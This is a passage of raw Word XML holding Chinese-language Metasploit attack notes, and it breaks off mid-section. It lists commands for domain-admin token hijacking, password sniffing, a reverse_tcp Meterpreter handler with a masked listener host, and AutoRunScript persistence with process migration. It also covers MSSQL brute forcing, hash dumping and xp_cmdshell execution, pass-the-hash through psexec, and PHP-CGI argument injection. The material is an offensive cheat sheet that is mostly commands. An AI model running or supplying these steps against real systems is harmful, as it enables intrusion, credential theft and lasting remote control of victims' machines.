        </w:rPr>
        <w:t>【内网】</w:t>
      </w:r>
      <w:r w:rsidR="00125A07">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>劫持域管理</w:t>
      </w:r>
      <w:r w:rsidR="00125A07">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="00125A07" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> incognito 调用模块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查看域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRDefault="00125A07" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>list_token</w:t>
      </w:r>
      <w:r w:rsidR="004D59A1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D59A1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D59A1" w:rsidRDefault="004D59A1" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>impersonate_token  ADMIN\wing  劫持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRDefault="009618BE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5063" w:rsidRDefault="006C7F52" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【内网】</w:t>
      </w:r>
      <w:r w:rsidR="00EB5063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>密码嗅探</w:t>
      </w:r>
      <w:r w:rsidR="00EB5063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00EB5063">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>use auxiliary/sniffer/psnuffle</w:t>
      </w:r>
      <w:r w:rsidR="00BF7A60">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00902028">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">  其实这是个包嗅探模块</w:t>
      </w:r>
      <w:r w:rsidR="0039538A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（直接run）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009618BE" w:rsidRPr="002F6701" w:rsidRDefault="009618BE" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F6701" w:rsidRDefault="002F6701" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>自动运行脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD31D0" w:rsidRPr="00BD31D0" w:rsidRDefault="00BD31D0" w:rsidP="00BD31D0">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD31D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Autorunscript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>在生成会话的时候会自动执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>它能调用的脚本有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，最好就是调用自己预存下来的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00DD60D0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</w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>se expl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00DD60D0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="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00DD60D0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Pr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et </w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lhost ***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00DD60D0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Pr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et </w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lport ***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00DD60D0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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et </w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ExitOnSession false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD60D0" w:rsidRPr="00DD60D0" w:rsidRDefault="00C40FE1" w:rsidP="00A83AAD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Pr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>et </w:t>
      </w:r>
      <w:r w:rsidR="00DD60D0" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AutoRunScript persistence -r *** -p 7231 -U -X -I 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00494DF4" w:rsidRDefault="000E286C" w:rsidP="00494DF4">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="000E286C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">set AutoRunScript "migrate </w:t>
      </w:r>
      <w:r w:rsidR="0054488D">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">–N </w:t>
      </w:r>
      <w:r w:rsidRPr="000E286C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>explorer</w:t>
      </w:r>
      <w:r w:rsidR="0054488D">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="000E286C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054488D" w:rsidRDefault="0054488D" w:rsidP="0054488D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="kwd"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="typ"/>
        </w:rPr>
        <w:t>AutoRunScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve"> metsvc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00494DF4" w:rsidRPr="000E286C" w:rsidRDefault="00494DF4" w:rsidP="0054488D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>set AutoRunScript multi_console_command -rc /path/to/yourscript.rc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F6701" w:rsidRPr="000E286C" w:rsidRDefault="00A62CD5" w:rsidP="00A83AAD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00A83AAD" w:rsidRPr="00DD60D0">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xploit -j -z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F6701" w:rsidRDefault="007968E5" w:rsidP="007968E5">
      <w:r w:rsidRPr="007968E5">
        <w:t>show advanced</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00494DF4">
        <w:t>可以看到更多</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA203D" w:rsidRPr="007968E5" w:rsidRDefault="00CA203D" w:rsidP="007968E5"/>
    <w:p w:rsidR="00797330" w:rsidRDefault="00797330" w:rsidP="00797330">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpretere &gt; run multi_console_command </w:t>
      </w:r>
      <w:r w:rsidRPr="00E86E9B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008253EE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="str"/>
        </w:rPr>
        <w:t>"pwd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007968E5" w:rsidRPr="00797330" w:rsidRDefault="006A14E1" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相当于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t>meterpretere &gt; pwd</w:t>
      </w:r>
      <w:r w:rsidR="000518C9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797330" w:rsidRDefault="00E86E9B" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>如果要使用自己的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> multi_console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">_command </w:t>
      </w:r>
      <w:r w:rsidRPr="008253EE">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008253EE">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/root/msf.rc(需要注意</w:t>
      </w:r>
      <w:r w:rsidR="008253EE">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>rc两个参数不能反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c后面要跟东西的话就是命令</w:t>
      </w:r>
      <w:r w:rsidR="008253EE">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；2.不能使用~来表示当前用户的根目录，必须给出具体路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802A79" w:rsidRDefault="00802A79" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00802A79" w:rsidRDefault="00802A79" w:rsidP="00802A79">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve">run multicommand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
        </w:rPr>
        <w:t xml:space="preserve">cl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="str"/>
        </w:rPr>
        <w:t>"whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802A79" w:rsidRDefault="00802A79" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行cmd命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86E9B" w:rsidRPr="00797330" w:rsidRDefault="00E86E9B" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C42483" w:rsidRDefault="00C42483" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行cmd命令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C42483" w:rsidRDefault="00C42483" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(test) &gt;set payload windows/exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C42483" w:rsidRDefault="00C42483" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(test) &gt; set cmd calc</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmd =&gt; calc</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msf exploit(test) &gt; set exitfunc seh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>exitfunc =&gt; seh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C42483" w:rsidRDefault="00C42483" w:rsidP="00C42483">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50FBEFA2" wp14:editId="6C24F81C">
            <wp:extent cx="5334000" cy="2980055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://img.my.csdn.net/uploads/201112/15/0_13239317850d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112/15/0_13239317850d2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83" w:rsidRDefault="00C42483" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C42483" w:rsidRPr="005D5318" w:rsidRDefault="00C42483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SSQL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信息搜集：auxiliary/scanner/mssql/mssql_ping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爆破登录：auxiliary/scanner/mssql/mssql_login 需要自己提供账户与密码文件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lastRenderedPageBreak/>
        <w:t>登录后获取整个账户表：auxiliary/scanner/mssql/mssql_hashdump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登录后尽可能获取信息：auxiliary/scanner/mssql/mssql_enum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重新载入xp_cmdshell：auxiliary/scanner/mssql/mssql_exec #设置cmd为要执行的命令然后run就行了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sql语句执行：auxiliary/scanner/mssql/mssql_sql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D23050" w:rsidRDefault="00D23050" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>hash 传递攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23050" w:rsidRDefault="00D23050" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/windows/smb/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D23050" w:rsidRDefault="00D23050" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00746882" w:rsidRDefault="00746882" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746882" w:rsidRPr="00D7618B" w:rsidRDefault="00680052" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7618B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php_cgi_arg_injection</w:t>
      </w:r>
      <w:r w:rsidR="00DC6800" w:rsidRPr="00D7618B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746882" w:rsidRPr="00D7618B" w:rsidRDefault="00746882" w:rsidP="00746882">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7618B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746882" w:rsidRPr="00D7618B" w:rsidRDefault="00746882" w:rsidP="00746882">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7618B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  to an argument injection vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="00B5102F">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击端口是</w:t>
      </w:r>
      <w:r w:rsidR="00A6556A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>服务器端口</w:t>
      </w:r>
      <w:r w:rsidR="00B5102F">
        <w:rPr>
